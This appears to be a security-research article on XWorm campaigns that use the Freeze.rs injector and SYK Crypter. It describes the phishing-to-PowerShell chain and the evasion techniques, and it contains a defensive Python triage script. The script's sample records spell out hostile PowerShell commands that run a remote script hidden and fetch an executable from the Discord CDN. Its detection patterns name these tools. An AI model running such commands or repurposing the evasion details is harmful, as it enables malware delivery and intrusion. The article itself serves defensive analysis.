
The Rise of Freeze[.]rs Injector in XWorm Malware Attacks


## Introduction

In recent months, cybersecurity researchers at FortiGuard Labs have uncovered a concerning trend in cyberattacks. Malicious actors have started utilizing a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. This new attack chain, detected by Fortinet, demonstrates the rapid adoption of offensive tools by cybercriminals. In this article, we will provide an in-depth analysis of the Freeze[.]rs injector and its role in the propagation of the XWorm malware. We will also explore the attack chain, the obfuscation techniques employed, and the potential impact on targeted organizations.

## The Freeze[.]rs Injector

Freeze[.]rs is an open-source red teaming tool developed by Optiv. Initially released as a payload creation tool, it enables the circumvention of security solutions and the execution of shellcode in a stealthy manner. The primary goal of Freeze[.]rs is to remove Userland EDR hooks and execute shellcode to bypass endpoint monitoring controls. This tool has gained popularity in the cybersecurity community due to its effectiveness in evading detection.

However, the rise of Freeze[.]rs as an offensive tool has also attracted the attention of malicious actors. These threat actors have weaponized Freeze[.]rs to deliver the XWorm malware, a remote access trojan with a wide range of malicious functionalities. This combination poses a significant threat to organizations, as it allows attackers to gain control over compromised devices and harvest sensitive data.

## The XWorm Malware

XWorm is a commodity malware that has been observed in various cyberattacks. It is equipped with typical remote access trojan functionalities, including gathering machine information, capturing screenshots, logging keystrokes, and establishing control over compromised devices. The version of XWorm utilized in the Freeze[.]rs attacks is v3.1.

The XWorm payload is delivered to victim environments through a multi-layered attack chain, which we will explore in detail in the following sections. The primary targets of this malicious campaign are Europe and North America, as indicated by the C2 server’s traffic report.

## The Attack Chain

The attack chain begins with a phishing email that contains a booby-trapped PDF file. This PDF file serves as the initial access point for the attackers. When the victim clicks on the PDF file, they are redirected to an HTML file hosted on a remote server. The HTML file utilizes the ‘search-ms’ protocol to access an LNK file, which is disguised as a benign PDF file icon.

Upon clicking the LNK file, a PowerShell script is executed, launching the Freeze[.]rs injector and a crypter known as SYK Crypter. These tools work in tandem to further the attackers’ offensive actions. The Freeze[.]rs injector, written in Rust, injects shellcode into the victim’s environment, while the SYK Crypter is responsible for obfuscating the malware and bypassing security measures.

## The Role of SYK Crypter

SYK Crypter is a tool commonly used by threat actors to distribute various malware families, including AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT. It is delivered through a Discord content delivery network (CDN) disguised as benign purchase orders. SYK Crypter’s involvement in the Freeze[.]rs attacks adds an additional layer of obfuscation and complexity to the attack chain.

SYK Crypter employs polymorphism and string obfuscation techniques to evade detection by security solutions. It encodes the strings used in its execution flow and utilizes functions like “GetProcessesByName,” “Directory.Exists,” and “File.Exists” to assess the presence of security appliances within the compromised environment. These techniques make it challenging for security researchers to analyze and detect the malware.
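As an added defensive illustration (not code from the article or from FortiGuard Labs), the triage below runs over constructed process-creation records and flags the stages described in the two sections above: the search-ms protocol handler, a PowerShell launch from Explorer with a remote-path or LNK argument, and a fetch from the Discord CDN used to deliver SYK Crypter. The field names, regexes and sample records are assumptions for this example.

```python
import re

# Heuristics for the search-ms -> LNK -> PowerShell chain and the Discord CDN delivery
# described above; patterns and field names are assumptions, not FortiGuard's detections.
POWERSHELL = re.compile(r"\\powershell(?:_ise)?\.exe$", re.I)
SUSPICIOUS_FLAGS = re.compile(r"-(?:w\s+hidden|ep\s+bypass|enc\b)", re.I)
SEARCH_MS = re.compile(r"search-ms:", re.I)
DISCORD_CDN = re.compile(r"cdn\.discordapp\.com", re.I)
REMOTE_OR_LNK = re.compile(r"\\\\[\w.@-]+\\|\.lnk\b", re.I)  # UNC/WebDAV path or .lnk file

def triage(event):
    """Return the reasons a process-creation record matches the chain (empty if none)."""
    reasons = []
    image, cmd = event.get("image", ""), event.get("cmdline", "")
    parent = event.get("parent", "")
    if SEARCH_MS.search(cmd):
        reasons.append("search-ms: protocol handler in command line")
    if POWERSHELL.search(image):
        if parent.lower().endswith("\\explorer.exe") and REMOTE_OR_LNK.search(cmd):
            reasons.append("PowerShell spawned by Explorer with a remote path or LNK argument")
        if SUSPICIOUS_FLAGS.search(cmd):
            reasons.append("PowerShell hidden/bypass/encoded flags")
    if DISCORD_CDN.search(cmd):
        reasons.append("payload fetched from Discord CDN")
    return reasons

def scan(events):
    """Return (index, reasons) for every record that triage() flags."""
    hits = []
    for i, event in enumerate(events):
        reasons = triage(event)
        if reasons:
            hits.append((i, reasons))
    return hits

# Constructed Sysmon-style records; 203.0.113.5 is a documentation address, not an IoC.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -File \\203.0.113.5@80\share\Order.ps1"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "iwr https://cdn.discordapp.com/attachments/0/0/PurchaseOrder.exe"'},
    {"parent": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\explorer.exe" "search-ms:query=Order&crumb=location:\\203.0.113.5@80\share"'},
]
```

Running `scan(SAMPLE_EVENTS)` flags records 1, 2 and 3 and leaves the benign Notepad launch alone; in practice these heuristics would be tuned against a baseline of the organization's own Explorer-to-PowerShell activity.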

## The Rust Injector – Freeze[.]rs

The Freeze[.]rs injector, written in Rust, is the heart of the attack chain. It is responsible for injecting shellcode into the victim’s environment, allowing the subsequent execution of the XWorm malware. The shellcode is obtained through Base64 decoding and LZMA decompression. The injector then utilizes functions from the NTAPI library to inject the shellcode into the victim’s system.

The adoption of the Freeze[.]rs injector by malicious actors highlights the effectiveness of this tool in evading security solutions. The rapid adoption of Freeze[.]rs since its release in 2023 showcases the agility and adaptability of cybercriminals in utilizing new offensive tools.

## Obfuscation Techniques

The attackers behind the Freeze[.]rs and XWorm malware attacks employ various obfuscation techniques to evade detection by security solutions. The shellcode within the Freeze[.]rs injector is encoded using Base64, and the file type and encryption algorithm can be selectively chosen within the program. This flexibility adds to the sophistication of the injector, making detection and analysis more challenging.

Additionally, SYK Crypter employs polymorphism and string obfuscation techniques to obfuscate its execution flow. The use of encoded strings and the assessment of security appliance presence further complicates detection and analysis for security researchers.

## Impact on Targeted Organizations

The combination of the Freeze[.]rs injector and the XWorm malware poses a significant threat to targeted organizations. Once the XWorm malware is executed, attackers gain control over compromised devices, allowing them to harvest sensitive data, capture screenshots, log keystrokes, and establish persistence within the victim’s environment.

The primary targets of this malicious campaign are organizations in Europe and North America, as indicated by the C2 server’s traffic report. The potential impact on these organizations includes data breaches, financial losses, reputational damage, and disruption of normal business operations.

## Conclusion

The rise of the Freeze[.]rs injector in the deployment of the XWorm malware highlights the agility and adaptability of cybercriminals in utilizing offensive tools. The combination of these tools poses a significant threat to organizations, as it allows attackers to gain control over compromised devices and harvest sensitive data. The multi-layered attack chain, obfuscation techniques, and primary targeting of organizations in Europe and North America make these attacks particularly concerning. To mitigate the risk, organizations should remain vigilant, employ robust security measures, and educate their employees about phishing and social engineering tactics.

Fortinet’s FortiGuard Labs continues to monitor and detect these attacks, providing essential protections against the Freeze[.]rs injector and XWorm malware. By staying informed and implementing proactive security measures, organizations can strengthen their defense against evolving cyber threats.
